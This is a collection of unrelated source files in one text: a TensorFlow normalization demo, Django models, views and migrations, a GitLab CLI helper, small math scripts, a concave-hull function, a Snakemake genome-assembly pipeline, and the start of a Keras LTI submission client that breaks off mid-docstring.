#print clf.predict(val), clf.predict_proba(val)
#
#val=exampleData('comp10-MMN')
#print clf.predict(val), clf.predict_proba(val)
|
import tensorflow as tf
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
from tensorflow.keras.layers import Dense
from tensorflow.keras import Sequential
from tensorflow.keras.optimizers import Adam
from sklearn import datasets
from sklearn import preprocessing
'''
Normalization (TensorFlow 1.x linear-regression demo):
1. min-max normalization
2. standardization
'''
# Toy dataset: 4 feature columns + 1 target column per row.
data = [[828, 920, 1234567, 1020, 1111],
        [824, 910, 2345612, 1090, 1234],
        [880, 900, 3456123, 1010, 1000],
        [870, 990, 2312123, 1001, 1122],
        [860, 980, 3223123, 1008, 1133],
        [850, 970, 2432123, 1100, 1221]]
data = np.float32(data)
# Scale every column to [0, 1]; keep the scaler for later inversion.
scale = preprocessing.MinMaxScaler()
data = scale.fit_transform(data)
x_data = data[:, :-1]
y_data = data[:, -1:]
print(x_data)
print(y_data)
# Linear model: hx = X @ w + b (TF1 graph-mode API).
w = tf.Variable(tf.random_uniform([4, 1]))
b = tf.Variable(tf.random_uniform([1]))
X = tf.placeholder(dtype=tf.float32, shape=[None, 4])
Y = tf.constant(y_data, dtype=tf.float32)
hx = tf.matmul(X, w) + b
# Mean-squared-error loss minimised with plain gradient descent.
cost = tf.reduce_mean(tf.square(hx - Y))
optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.001)
train = optimizer.minimize(cost)
sess = tf.Session()
init = tf.global_variables_initializer()
sess.run(init)
# Train for 1000 steps, logging the loss every 100 steps.
for i in range(1000):
    sess.run(train, feed_dict={X: x_data})
    if not i % 100:
        print(i, sess.run(cost, feed_dict={X: x_data}))
print(sess.run(w))
print(sess.run(b))
# Predicted values
print(sess.run(hx, feed_dict={X: x_data}))
# Actual values
print(y_data)
# Inverse normalization: fit a scaler on the raw target column only so a
# predicted (normalised) value can be mapped back to the original scale.
data = [[828, 920, 1234567, 1020, 1111],
        [824, 910, 2345612, 1090, 1234],
        [880, 900, 3456123, 1010, 1000],
        [870, 990, 2312123, 1001, 1122],
        [860, 980, 3223123, 1008, 1133],
        [850, 970, 2432123, 1100, 1221]]
data = np.float32(data)
y1 = data[:, -1:]
ny = preprocessing.MinMaxScaler()
y1 = ny.fit_transform(y1)
# NOTE(review): passing None as the (unused) target column through
# scale.transform relies on np.float32 coercing it — confirm this works
# with the installed sklearn/numpy versions.
xx = scale.transform(([[828, 920, 1234567, 1020, None]]))
xx = xx[:, :-1]
print(xx)
yy = sess.run(hx, feed_dict={X: xx})
print(ny.inverse_transform(yy))
|
from django.db import models
# Create your models here.
class SiteSetting(models.Model):
    """Singleton-style site configuration (title, contacts, logo, footer texts).

    verbose_name strings are in Persian (the site's admin language).
    """
    title = models.CharField(max_length=50, verbose_name='عنوان سایت')
    address = models.CharField(max_length=200, verbose_name='آدرس شرکت')
    phone = models.CharField(max_length=50, verbose_name='شماره ی تماس')
    email = models.EmailField(max_length=50, verbose_name='ایمیل')
    # Optional logo stored under MEDIA_ROOT/logo/.
    logo_image = models.ImageField(upload_to='logo/', null=True, blank=True, verbose_name='لوگوی شرکت')
    about_us = models.TextField(verbose_name='درباره ی ما')
    copy_right = models.TextField(verbose_name='متن کپی رایت')
    def __str__(self):
        # Shown in the admin list view.
        return self.title
    class Meta:
        verbose_name = 'تنظیمات سایت'
        verbose_name_plural = 'بخش تنظیمات'
|
from django.shortcuts import render, HttpResponse, HttpResponseRedirect
from home.models import Person
from datetime import date
def home(request):
    """Render the landing page (form handling is commented out)."""
    #name = request.POST['name']
    #number = request.POST['number']
    #print(name, number, '**********haaaaahahahaha')
    return render(request, 'home.html')
def about(request):
    """Render the about page; on POST, save a new Person from the form data.

    NOTE(review): after a POST the page is rendered without the persons
    list (only GET populates context) — confirm this is intentional.
    """
    context = {}
    if request.method == 'POST':
        name = request.POST['name']
        phone = request.POST['phone']
        birth_date = request.POST['birth_date']
        email = request.POST['email']
        Person(name=name, phone=phone, birth_date=birth_date, email=email).save()
    else:
        persons = Person.objects.all()
        context['persons'] = persons
    return render(request, 'about.html', context)
def delete_person(request):
    """Delete the Person with the POSTed id; respond with the id on success.

    NOTE(review): on failure the raw exception text is returned to the
    client, which leaks internals — consider a generic error response.
    """
    try:
        person_id = request.POST['id']
        person = Person.objects.filter(id=person_id)
        if person:
            person[0].delete()
        return HttpResponse(person_id)
    except Exception as e:
        return HttpResponse(str(e))
def filter_persons(request):
    """
    Render the persons whose date_registered falls inside the POSTed
    [from_date, to_date] range; an empty to_date defaults to today.

    (Removed the old try/except that only re-raised — it was a no-op.)
    """
    from_date = request.POST['from_date']
    to_date = request.POST['to_date']
    if to_date == '':
        to_date = date.today()
    persons = Person.objects.filter(date_registered__range=[from_date, to_date])
    print(persons)
    context = {'persons':persons}
    return render(request, 'registered_persons.html', context)
|
import requests
import json
import os
import gitlab
import sys
from authorization import gl
# Holds exactly one entry: {"project": ...} or {"group": ...}.
namespace = {}
def check_exist(list_available, name):
    """Abort with exit status 1 when a GitLab search returned no results."""
    if not list_available:
        print(f"no group or project available for {name} name")
        sys.exit(1)
def get_project(name):
    """Return the first owned project matching `name` (exits if none)."""
    matches = gl.projects.list(owned=True, search=name)
    check_exist(matches, name)
    return matches[0]
def get_group(name):
    """
    Return the first group matching `name` (exits if none).

    BUG FIX: the previous version ignored its `name` argument and re-read
    sys.argv['-g'] directly, which broke any caller that did not pass -g
    on the command line (e.g. the environment-variable path).
    """
    matches = gl.groups.list(search=name)
    check_exist(matches, name)
    return matches[0]
# Resolve the target project/group: CLI flags take precedence over the
# CLI_GITLAB_PROJECT / CLI_GITLAB_GROUP environment variables.
if "-p" in sys.argv:
    namespace["project"] = get_project(sys.argv[sys.argv.index('-p') + 1])
elif "-g" in sys.argv:
    namespace["group"] = get_group(sys.argv[sys.argv.index('-g') + 1])
elif os.environ.get('CLI_GITLAB_PROJECT'):
    namespace['project'] = get_project(os.environ.get('CLI_GITLAB_PROJECT'))
elif os.environ.get('CLI_GITLAB_GROUP'):
    # BUG FIX: this branch used to call get_project() for a *group* name.
    namespace['group'] = get_group(os.environ.get('CLI_GITLAB_GROUP'))
if not namespace:
    print("Missing project or group name (use -p PROJECT_NAME or -g GROUP_NAME or environement variables (see --help))")
    sys.exit(1)
if len(namespace) > 1:
    print("You provide too much objects (for example multiple projects or both group and project). Check your environment variables. Pass one project or one group")
    for i in namespace.values():
        print(f"{i.name} provided")
    sys.exit(1)
|
# Generated by Django 3.0.5 on 2020-04-29 17:45
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated: move the tags M2M relation from Order to Product."""
    dependencies = [
        ('home', '0005_auto_20200429_1343'),
    ]
    operations = [
        migrations.RemoveField(
            model_name='order',
            name='tags',
        ),
        migrations.AddField(
            model_name='product',
            name='tags',
            field=models.ManyToManyField(to='home.Tag'),
        ),
    ]
|
# Generated by Django 3.0.3 on 2020-05-09 23:01
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated: fix the typo in Product.short_descriptions."""
    dependencies = [
        ('product', '0003_auto_20200509_2259'),
    ]
    operations = [
        migrations.RenameField(
            model_name='product',
            old_name='short_descriptions',
            new_name='short_description',
        ),
    ]
|
def isPrime(num):
    """
    Return True if num is a prime number, False otherwise.

    BUG FIXES vs the old version: num=0 no longer crashes with
    ZeroDivisionError (`num % num`), and 1 and negative numbers now
    correctly return False. Trial division stops at sqrt(num) instead
    of scanning every value below num.
    """
    if num < 2:
        return False
    i = 2
    while i * i <= num:
        if num % i == 0:
            return False
        i += 1
    return True
def isSquare(num):
    """
    Return True if num is a perfect square, False otherwise.

    O(1) instead of the old O(n) scan; also fixes the old behaviour of
    returning True for negative numbers (empty range left the initial
    True untouched). Candidates around int(sqrt) guard float rounding.
    """
    if num < 0:
        return False
    root = int(num ** 0.5)
    for candidate in (root - 1, root, root + 1):
        if candidate * candidate == num:
            return True
    return False
# Classify every value in [100, 1000000): "Foo" for primes, "Bar" for
# perfect squares, "FooBar" otherwise (Python 2 print statements).
for value in range(100, 1000000):
    primeCheck = isPrime(value)
    squareCheck = isSquare(value)
    if primeCheck == True:
        print "Foo", value
    elif squareCheck == True:
        print "Bar", value
    else:
        print "FooBar", value
|
# most credit goes to https://github.com/lelilia/ <3
# Parse line 2 of the input into (offset, bus_id) pairs, skipping 'x' slots.
busses = [(x[0], int(x[1])) for x in enumerate(open('data/13.txt').read().split('\n')[1].split(',')) if x[1] != 'x']
t = 0
stepsize = 1
print(busses)
# Sieve-style Chinese Remainder Theorem: once t satisfies a bus's
# congruence, advance only in multiples of the bus ids seen so far so the
# earlier congruences stay satisfied.
for departure, bus in busses:
    while t % bus != (bus - departure) % bus:
        t += stepsize
    stepsize *= bus
print(t)
|
"""
THE FOLLOWING CODE IS ADAPTED FROM HERE:
http://blog.thehumangeo.com/2014/05/12/drawing-boundaries-in-python/
"""
#-------------------------------- IMPORTS -----------------------------------
from shapely.ops import cascaded_union, polygonize
from scipy.spatial import Delaunay
import numpy as np
import shapely.geometry as geometry
#------------------------ FUNCTION DEFINITIONS ------------------------------
def alpha_shape(points, alpha):
    """
    Compute the alpha shape (concave hull) of a set of 2D points.
    Parameters:
    ----------
    points: Iterable container of shapely points.
    alpha: alpha value that characterizes the border. Small alpha means
        only really long edges get pruned. Large alpha means lots of edges
        get pruned, even short ones.
    Returns:
    -------
    concave_hull: The concave hull of 'points', for the given value of alpha.
        It's a shapely polygon or polygon collection.
    edge_points: The vertices that make up concave_hull.
    """
    if len(points) <= 3:
        # Too few points to triangulate: fall back to the convex hull.
        # BUG FIX: return a (hull, edge_points) pair like the main path
        # does, so tuple-unpacking callers don't crash on small inputs.
        return geometry.MultiPoint(list(points)).convex_hull, []
    def add_edge(edges, edge_points, coords, i, j):
        """
        Add a line between the i-th and j-th points,
        if not in the list already
        """
        if (i, j) in edges or (j, i) in edges:
            # already added
            return
        edges.add( (i, j) )
        edge_points.append(coords[ [i, j] ])
    # Get Delaunay triangulation of points
    coords = np.array([point.coords[0] for point in points])
    tri = Delaunay(coords)
    # initialize edges and edge_points
    edges = set()
    edge_points = []
    # loop over the triangles in the Delaunay triangulation.
    # ia, ib, ic are indices of vertices of a given triangle
    # pa, pb, pc are coordinates of vertices
    for ia, ib, ic in tri.vertices:
        pa = coords[ia]
        pb = coords[ib]
        pc = coords[ic]
        # Lengths of edges
        a = ((pa[0]-pb[0])**2 + (pa[1]-pb[1])**2)**0.5
        b = ((pb[0]-pc[0])**2 + (pb[1]-pc[1])**2)**0.5
        c = ((pc[0]-pa[0])**2 + (pc[1]-pa[1])**2)**0.5
        # Semiperimeter of triangle
        s = (a + b + c)/2.0
        # Squared area of triangle by Heron's formula.
        # BUG FIX: degenerate (collinear) triangles have zero area and the
        # old code divided by it (ZeroDivisionError); float rounding can
        # even push the product slightly negative. Skip such triangles.
        area_sq = s*(s-a)*(s-b)*(s-c)
        if area_sq <= 0:
            continue
        area = area_sq**0.5
        # Here's the radius filter: keep edges of triangles whose
        # circumradius is below 1/alpha.
        circum_r = a*b*c/(4.0*area)
        if circum_r < 1.0/alpha:
            add_edge(edges, edge_points, coords, ia, ib)
            add_edge(edges, edge_points, coords, ib, ic)
            add_edge(edges, edge_points, coords, ic, ia)
    # Polygonize the kept edges and merge the triangles into the hull.
    m = geometry.MultiLineString(edge_points)
    triangles = list(polygonize(m))
    concave_hull = cascaded_union(triangles)
    return concave_hull, edge_points
|
## ucdbioinfo_supernova_pipeline
## runs the process_10xReads.py script from the proc10xG repo
## https://github.com/ucdavis-bioinformatics/proc10xG
## Assumes only a single pair of fastq (R1/R2) files under the fastqs folder
import os
import json
args = {}
sbatch_args = {}
#TODO take this in from the CLI argument
# TODO -t threads?? MEM PER NODE
configfile: "templates/keith.json"
###########################################################################
# CHECK IF SRUN OR SBATCH
###########################################################################
# Normalize the config flag into a real boolean under args['running_locally'].
if config["__default__"]["running_locally"]=="True":
    # print ("Running Locally")
    args["running_locally"] = True
else:
    # BUG FIX: this key used to stay unset on the cluster path, so every later
    # args['running_locally'] lookup raised KeyError.
    args["running_locally"] = False
    print ("Running on cluster")
    #print ("My SLURM_JOB_ID: %s" %(os.environ['SLURM_JOB_ID']))
    #args['cluster_threads'] = os.environ['SLURM_NTASKS']
    #print ("My SLURM_JOB_ID: %s" %(os.environ['SLURM_JOB_ID']))
###########################################################################
# CORE SETUP
###########################################################################
args['pipeline'] = config['pipeline']['basepath']
args['basename'] = config['project']['basename']
args['id'] = config['project']['id']
args['fastqs'] = args['basename'] + '/' + config['project']['fastqs']
files = os.listdir(args['fastqs'])
# ILLUMINA 10X: locate the single R1/R2 fastq pair under the fastqs folder
for file in files:
    if "R1_001.fastq.gz" in file:
        args['fastq1'] = args['fastqs'] + '/' + file
    if "R2_001.fastq.gz" in file:
        args['fastq2'] = args['fastqs'] + '/' + file
###########################################################################
# PARAMETERS
###########################################################################
# PROC10XG
args['proc10xg_out'] = args['basename'] + '/01-%s-%s_reads' % (args['id'], 'proc10xG')
args['proc10xg_outprefix'] = args['proc10xg_out'] + '/%s-%s' % (args['id'], 'proc10xG_reads')
args['fastq1_proc10xg_out'] = args['proc10xg_outprefix'] + '_R1_001.fastq.gz'
args['fastq2_proc10xg_out'] = args['proc10xg_outprefix'] + '_R2_001.fastq.gz'
args['log_out'] = args['proc10xg_outprefix'] + '.log'
args['proc10xPath'] = args['pipeline'] + '/%s' % ('proc10xG')
# KAT READS
args['kat_reads_out'] = args['basename'] + '/02-%s-%s' % (args['id'], 'kat_reads')
args['kat_reads_outprefix'] = args['kat_reads_out'] + '/%s-%s' % (args['id'], 'kat_reads')
args['kmers'] = config['kat_reads']['kmers']
# RUN SUPERNOVA
args['supernova_out'] = args['basename'] + '/01-%s-%s' % (args['id'], 'supernova_run')
args['supernova_id'] = '01-%s-%s' % (args['id'], 'supernova_run')
args['supernova_read_count'] = config["supernova"]["read_count"]
args['supernova_out_dir'] = args['supernova_out'] + '/' + 'outs'
args['supernova_seqout'] = args['basename'] + '/02-%s-%s' %(args['id'], 'supernova_outs')
args['supernova_out_prefix'] = args['supernova_seqout'] + '/%s-%s' %(args['id'], 'supernova_mkout')
# MKBWA
args['supernova_seqin1'] = args['supernova_seqout'] + '/%s-supernova_mkout-pseudohap2.1.fasta.gz' % args['id']
args['supernova_seqin2'] = args['supernova_seqout'] + '/%s-supernova_mkout-pseudohap2.2.fasta.gz' % args['id']
# KAT COMP and SECT
args['kat_compsect_out'] = args['basename'] + '/03-%s-%s' % (args['id'], 'assembly_eval')
args['kat_comp1'] = args['kat_compsect_out'] + '/%s-kat_eval-h1_vs_pe' % args['id']
args['kat_comp2'] = args['kat_compsect_out'] + '/%s-kat_eval-all_vs_pe' % args['id']
args['kat_sect'] = args['kat_compsect_out'] + '/%s-kat_eval-sect-h1_vs_pe' % args['id']
# MAP BARCODES
# BUG FIX: these four paths previously left a literal '%s' in the file names
# because the "% args['id']" substitution was missing (all sibling paths use it).
args['assembly_eval_outprefix'] = args['kat_compsect_out'] + '/%s-assembly_eval-bwa.bam' % args['id']
args['assembly_eval_flagstat'] = args['kat_compsect_out'] + '/%s-assembly_eval-bwa.bam.flagstat' % args['id']
args['assembly_eval_idxstats'] = args['kat_compsect_out'] + '/%s-assembly_eval-bwa.bam.idxstats' % args['id']
args['assembly_eval_stats'] = args['kat_compsect_out'] + '/%s-assembly_eval-bwa.bam.stats' % args['id']
###########################################################################
# MODULE LOADS and SBATCH SETUP
###########################################################################
# BUG FIX: the old condition compared a boolean against the string "False"
# (and raised KeyError when the key was never set on the cluster path), so
# the sbatch command strings were never built.  .get() is safe either way.
if not args.get('running_locally'):
    import socket
    # BUG FIX: this branch is the CLUSTER path; the old message said "Running Locally".
    print("Running on cluster node:")
    print(socket.gethostname())
    for sbatch in ['kat_reads_sbatch', 'mkoutput_supernova_sbatch', 'mkbwaref_sbatch', 'kat_comp1_sbatch',
                   'kat_comp2_sbatch', 'kat_sect_sbatch', 'map_barcodes_sbatch']:
        args[sbatch] = "sbatch -J %s -N %s -p %s -t %s -n %s -m %s --output %s --error %s --mail-type %s --mail-user %s" \
            % (config[sbatch]['job-name'], config[sbatch]['n'], config[sbatch]['partition'],
               config[sbatch]['time'], config[sbatch]['ntasks'], config[sbatch]['mem'],
               config[sbatch]['output'], config[sbatch]['error'], config[sbatch]['mail-type'],
               config[sbatch]['mail-user'],)
# BUG FIX: shell.prefix() REPLACES the prefix, so the second call used to
# silently drop "set -o pipefail"; combine both into a single prefix.
shell.prefix("set -o pipefail; module load kat; module load anaconda2; module load bwa/0.7.16a; module load samtools/1.9; module load supernova/2.1.1; ")
shell("module list")
print(json.dumps(args, indent=1))
###########################################################################
# SBATCH SETUP
###########################################################################
# args['cluster_time'] = config['kat_reads_sbatch']['main']['time']
# args['cluster_account'] = config['kat_reads_sbatch']['main']['account']
# args['cluster_partition'] = config['kat_reads_sbatch']['main']['partition']
# args['cluster_nodes'] = config['kat_reads_sbatch']['main']['n']
rule kat_sect:
    input:
        seqin_1 = args['supernova_seqin1'],
        proc10xin_1 = args['fastq1_proc10xg_out'],
        proc10xin_2 = args['fastq2_proc10xg_out']
    output:
        kat_sect_out = args['kat_sect']
    run:
        # TODO check raw command
        # BUG FIX: the -o prefix previously used args['kat_comp1'] (copy-paste
        # from the comp rules), so this rule never produced its declared output.
        arg_list = config['kat_sect_sbatch']['ntasks'], args['kat_sect'], args['supernova_seqin1'], \
            str(args['proc10xPath']) + '/filter_10xReads.py', args['fastq1_proc10xg_out'], args['fastq2_proc10xg_out']
        command = "kat sect -t%s -H10000000000 -o %s <( gunzip -c %s) <( %s -1 %s -2 %s ) " % arg_list
        if not args['running_locally']:
            # BUG FIX: space before --wrap so it is not glued onto the
            # preceding sbatch --mail-user value.
            command = args['kat_sect_sbatch'] + " --wrap=" + "'" + command + "'"
        print(command)
        shell(command)
rule kat_comp2:
    input:
        seqin_1 = args['supernova_seqin1'],
        proc10xin_1 = args['fastq1_proc10xg_out'],
        proc10xin_2 = args['fastq2_proc10xg_out']
    output:
        kat_comp2_out = args['kat_comp2']
    run:
        # TODO check raw command
        # Compare filtered read k-mers against BOTH pseudohap assemblies.
        arg_list = config['kat_comp2_sbatch']['ntasks'], args['kat_comp2'], str(args['proc10xPath']) + '/filter_10xReads.py', \
            args['fastq1_proc10xg_out'], args['fastq2_proc10xg_out'], args['supernova_seqin1'], args['supernova_seqin2']
        command = "kat comp -t%s -I10000000000 -H10000000000 -o %s <( %s -1 %s -2 %s ) <( gunzip -c %s %s)" % arg_list
        if not args['running_locally']:
            # BUG FIX: space before --wrap so it is not glued onto the
            # preceding sbatch --mail-user value.
            command = args['kat_comp2_sbatch'] + " --wrap=" + "'" + command + "'"
        print(command)
        shell(command)
rule kat_comp1:
    input:
        seqin_1 = args['supernova_seqin1'],
        proc10xin_1 = args['fastq1_proc10xg_out'],
        proc10xin_2 = args['fastq2_proc10xg_out']
    output:
        kat_comp1_out = args['kat_comp1']
    run:
        # TODO check raw command
        # Compare filtered read k-mers against the first pseudohap assembly only.
        arg_list = config['kat_comp1_sbatch']['ntasks'], args['kat_comp1'], str(args['proc10xPath']) + '/filter_10xReads.py', \
            args['fastq1_proc10xg_out'], args['fastq2_proc10xg_out'], args['supernova_seqin1']
        command = "kat comp -t%s -I10000000000 -H10000000000 -o %s <( %s -1 %s -2 %s ) <( gunzip -c %s)" % arg_list
        if not args['running_locally']:
            # BUG FIX: space before --wrap so it is not glued onto the
            # preceding sbatch --mail-user value.
            command = args['kat_comp1_sbatch'] + " --wrap=" + "'" + command + "'"
        print(command)
        shell(command)
rule map_barcodes:
    input:
        seqin_1 = args['supernova_seqin1'],
        proc10xin_1 = args['fastq1_proc10xg_out'],
        proc10xin_2 = args['fastq2_proc10xg_out']
    output:
        bam_out = args['assembly_eval_outprefix'],
        bam_flagstat = args['assembly_eval_flagstat'],
        bam_idxstats = args['assembly_eval_idxstats'],
        bam_stats = args['assembly_eval_stats']
    run:
        # TODO check raw commands
        # Split the allotted tasks between bwa mem and samtools sort.
        THREADS = config['map_barcodes_sbatch']['ntasks']  # assumed to be an int in config — TODO confirm
        MAPTHREADS = THREADS-6
        SORTTHREADS = THREADS-MAPTHREADS
        arg_list = MAPTHREADS, args['id'], args['id'], args['supernova_seqin1'], args['fastq1_proc10xg_out'], \
            args['fastq2_proc10xg_out'], str(args['proc10xPath']) + '/samConcat2Tag.py', SORTTHREADS, args['assembly_eval_outprefix']
        command_bwa = "bwa mem -t %s -C -R '@RG\tID:%s\tSM:%s\tPL:ILLUMINA\tDS:Paired' %s %s %s | python %s | samtools sort -m 768M --threads %s | samtools view -hb -o %s -" % arg_list
        command_index = "samtools index -@ %s %s" %(str(THREADS), args['assembly_eval_outprefix'])
        # BUG FIX: the redirect was "> %st", which appended a stray 't' to the flagstat path.
        command_flagstat = "samtools flagstat -@ %s %s > %s" %(str(THREADS), args['assembly_eval_outprefix'], args['assembly_eval_flagstat'])
        command_view = "samtools view -b -q 30 -f 0x2 -F 0x904 %s | samtools idxstats - > %s" %(args['assembly_eval_outprefix'], args['assembly_eval_idxstats'])
        command_stats = "samtools stats -@ %s %s > %s" %(str(THREADS), args['assembly_eval_outprefix'], args['assembly_eval_stats'])
        master_list = [command_bwa, command_index, command_flagstat, command_view, command_stats]
        # BUG FIX: join is a str method — ';'.join(list) — lists have no .join,
        # so both branches previously raised AttributeError.
        if args['running_locally']:
            command = ';'.join(master_list)
        else:
            # BUG FIX: space before --wrap so it is not glued onto --mail-user.
            command = args['map_barcodes_sbatch'] + " --wrap=" + "'" + ';'.join(master_list) + "'"
        print(command)
        shell(command)
rule kat_reads:
    input:
        proc10xg_out = args['log_out'],
        fastq1 = args['fastq1_proc10xg_out'],
        fastq2 = args['fastq2_proc10xg_out']
    params:
        proc10xg_outprefix = args['proc10xg_outprefix'],
        proc10xg_out = args['proc10xg_out'],
        proc10xg_path = args['proc10xPath'],
        kat_reads_out = args['kat_reads_out'],
        kat_reads_outprefix = args['kat_reads_outprefix'],
        log_out = args['log_out'],
        kmers = args['kmers'],
        outputs = expand(args['kat_reads_outprefix'] + '-' + '{kmer}', kmer = args['kmers'])
    output:
        kat_reads_out = args['kat_reads_out']
    run:
        # One "kat hist" invocation per requested k-mer size.
        for kmer, output in zip(params.kmers, params.outputs):
            arg_list = output, kmer, config['kat_reads_sbatch']['ntasks'], params.proc10xg_path, args['fastq1_proc10xg_out'], args['fastq2_proc10xg_out']
            command = "kat hist -o %s -m %s -t %s <(%s -1 %s -2 %s)" % arg_list
            if not args['running_locally']:
                # BUG FIX: derive the per-kmer sbatch string from the pristine
                # template instead of mutating args[...] in place (repeated
                # .replace on the mutated value corrupted the log file names),
                # and put a space before --wrap.
                sbatch_prefix = args['kat_reads_sbatch'].\
                    replace(".err", str(kmer) + ".err").replace(".out", str(kmer) + ".out")
                command = sbatch_prefix + " --wrap=" + "'" + command + "'"
            print(command)
            shell(command)
rule proc10xG:
    input:
        fastq1 = args['fastq1'],
        fastq2 = args['fastq2']
    params:
        proc10xg_outprefix = args['proc10xg_outprefix'],
        proc10xg_out = args['proc10xg_out'],
        proc10xg_path = args['proc10xPath'],
        log_out = args['log_out']
    output:
        #log_out = args['log_out'],
        out_dir = args['proc10xg_out'],
        fastq1_out = args['fastq1_proc10xg_out'],
        fastq2_out = args['fastq2_proc10xg_out']
    run:
        arg_list = args['proc10xPath'], args['fastq1'], args['fastq2'], args['proc10xg_outprefix'], args['log_out']
        # BUG FIX: the command was wrapped in backticks, which made the shell
        # run process_10xReads.py via command substitution and then try to
        # execute its stdout as a second command.
        command = "python %s/process_10xReads.py -1 %s -2 %s -o %s -a 2> %s" % arg_list
        print(command)
        shell(command)
rule mkbwaref:
    input:
        bwa_seq = args['supernova_seqin1']
    output:
        bwa_out = str(args['supernova_seqin1']) + '.bwt'
    run:
        # Build the bwa index alongside the pseudohap assembly fasta.
        command = "bwa index %s" % args['supernova_seqin1']
        if not args['running_locally']:
            # BUG FIX: space before --wrap so it is not glued onto the
            # preceding sbatch --mail-user value.
            command = args['mkbwaref_sbatch'] + " --wrap=" + "'" + command + "'"
        print(command)
        shell(command)
rule mkoutput_supernova:
    input:
        in_dir = args['supernova_out_dir']
    output:
        seqout = args['supernova_seqout'],
        bwa_seq = args['supernova_seqin1']
    run:
        # Produce one FASTA per requested supernova output style.
        for outstyle, minsize in zip(config['supernova']['outstyle'], config['supernova']['minsize']):
            arg_list = input.in_dir, args['supernova_out_prefix'] + '-' + outstyle, outstyle, minsize
            command = "supernova mkoutput --asmdir=%s/assembly --outprefix=%s --style=%s --minsize=%s --headers=full" % arg_list
            if not args['running_locally']:
                # BUG FIX: the args key contained a stray '"' character
                # ('"mkoutput_supernova_sbatch') and always raised KeyError;
                # also avoid mutating the template across loop iterations and
                # put a space before --wrap.
                sbatch_prefix = args['mkoutput_supernova_sbatch'].\
                    replace(".err", outstyle + ".err").replace(".out", outstyle + ".out")
                command = sbatch_prefix + " --wrap=" + "'" + command + "'"
            print(command)
            shell(command)
# Run the supernova assembler itself; always executed on the current node
# (this rule is never dispatched through sbatch).
rule run_supernova:
    input:
        fastq1 = args['fastq1'],
        fastq2 = args['fastq2']
    params:
        supernova_out = args['supernova_out'],
        read_count = args['supernova_read_count'],
        fastqs = args['fastqs']
    output:
        out_dir = args['supernova_out_dir']
    run:
        #TODO check local cores and nproc, MRO_DISK_SPACE_CHECK=disable
        # NOTE(review): --localcores is hard-coded to 48; consider reading it
        # from config like the other resources.
        arg_list = args['supernova_id'], args['supernova_read_count'], args['fastqs'], 48
        command = "supernova run --id=%s --maxreads=%s --fastqs=%s --localcores=%s" % arg_list
        print(command)
        shell(command)
# Source rule: declares the raw Illumina 10x fastq pair as pipeline inputs
# (no body — these files must already exist under the fastqs folder).
rule Illumina_10x:
    output:
        fastq1 = args['fastq1'],
        fastq2 = args['fastq2']
# Aggregate pseudo-targets. 'all' collects every pipeline product;
# right_side/left_side/bottom select sub-graphs of the DAG.
# NOTE(review): snakemake treats the FIRST rule in the file as the default
# target; since 'all' is declared near the end, it must be requested by name.
rule all:
    input:
        rules.kat_reads.output,
        rules.proc10xG.output,
        rules.run_supernova.output,
        rules.mkoutput_supernova.output,
        rules.kat_comp1.output,
        rules.kat_comp2.output,
        rules.kat_sect.output,
        rules.mkbwaref.output,
        rules.map_barcodes.output,
# Read preprocessing + read k-mer histograms only.
rule right_side:
    input:
        rules.proc10xG.output,
        rules.kat_reads.output
# Assembly and assembly export only.
rule left_side:
    input:
        rules.run_supernova.output,
        rules.mkoutput_supernova.output
# Assembly evaluation only.
rule bottom:
    input:
        rules.kat_comp1.output,
        rules.kat_comp2.output,
        rules.kat_sect.output,
        rules.mkbwaref.output,
        rules.map_barcodes.output
|
"""
This file declares all the valid routes for Dash app URL routing
"""
HOME_ROUTE = "/"
GRAPHS_PAGE_ROUTE = "/graphs"
|
from importa_e_trata_txts import abre_documento, imprime_planilha
import re
''' Algorítmo usado para a main temporária de códigos reutilizáveis '''
# Pull (title, link) pairs out of links.txt and dump them to a spreadsheet:
# a title line starting with a capital letter, followed by one or more
# http(s) link lines.
lista_titulos_links = []
corpo_documento = abre_documento('links.txt')
linhas_documentos = re.findall(r'^([A-Z](?:\S{1,}|\s{1,2})+?)\n*(http(?:\S{1,}|\n)+)\n', corpo_documento, flags=re.MULTILINE)
# Each regex match is a tuple; the spreadsheet writer expects mutable rows.
linhas_documentos_lista = [list(par) for par in linhas_documentos]
print(linhas_documentos_lista)
imprime_planilha(linhas_documentos_lista, ['Referências', 'Links'])
|
import json
import logging
import typing
from typing import TYPE_CHECKING
import numpy as np
import progressbar
import requests
from kerasltisubmission import loader
from kerasltisubmission.exceptions import (
KerasLTISubmissionBadResponseException,
KerasLTISubmissionConnectionFailedException,
KerasLTISubmissionException,
KerasLTISubmissionInputException,
KerasLTISubmissionInvalidSubmissionException,
KerasLTISubmissionNoInputException,
)
# Imported only for static type checking to avoid circular imports at runtime.
if TYPE_CHECKING:  # pragma: no cover
    from kerasltisubmission import Submission  # noqa: F401
    from kerasltisubmission.kerasltisubmission import ModelType  # noqa: F401
# Library logger; NullHandler keeps the package silent unless the host
# application configures logging.
log = logging.getLogger("kerasltisubmission")
log.addHandler(logging.NullHandler())
# Type aliases for the provider API payloads.
AnyIDType = typing.Union[str, int]
SingleInputType = typing.Dict[str, typing.Any]
InputsType = typing.List[SingleInputType]
PredictionsType = typing.Dict[str, typing.Any]
class LTIProvider:
    """Client for an LTI grading provider.

    Fetches assignment validation inputs from ``input_api_endpoint``, runs a
    submitted Keras model over them, and posts the predictions to
    ``submission_api_endpoint`` for grading.
    """
    def __init__(
        self,
        input_api_endpoint: str,
        submission_api_endpoint: str,
        user_token: AnyIDType,
    ) -> None:
        # Token identifying the submitting user with the provider.
        self.user_token = user_token
        self.input_api_endpoint = input_api_endpoint
        self.submission_api_endpoint = submission_api_endpoint
    def get_validation_set_size(self, assignment_id: AnyIDType) -> typing.Optional[int]:
        """Return the assignment's validation-set size, or None if unavailable."""
        try:
            r = requests.get(
                f"{self.input_api_endpoint}/assignment/{assignment_id}/size"
            )
            rr = r.json()
        except Exception as e:
            # Network/JSON failures are wrapped; 'from None' hides the chain.
            raise KerasLTISubmissionConnectionFailedException(
                self.input_api_endpoint, e
            ) from None
        validation_set_size = None
        if r.status_code == 200:
            try:
                # NOTE(review): if "size" is absent, int(None) raises TypeError,
                # which this except clause does NOT catch — confirm intended.
                validation_set_size = int(rr.get("size"))
            except ValueError:
                pass
        return validation_set_size
    def guess(
        self, assignment_id: AnyIDType, predictions: PredictionsType
    ) -> typing.Tuple[float, float]:
        """POST predictions for grading; return (accuracy, grade) rounded to 2dp.

        Raises KerasLTISubmissionInvalidSubmissionException for empty
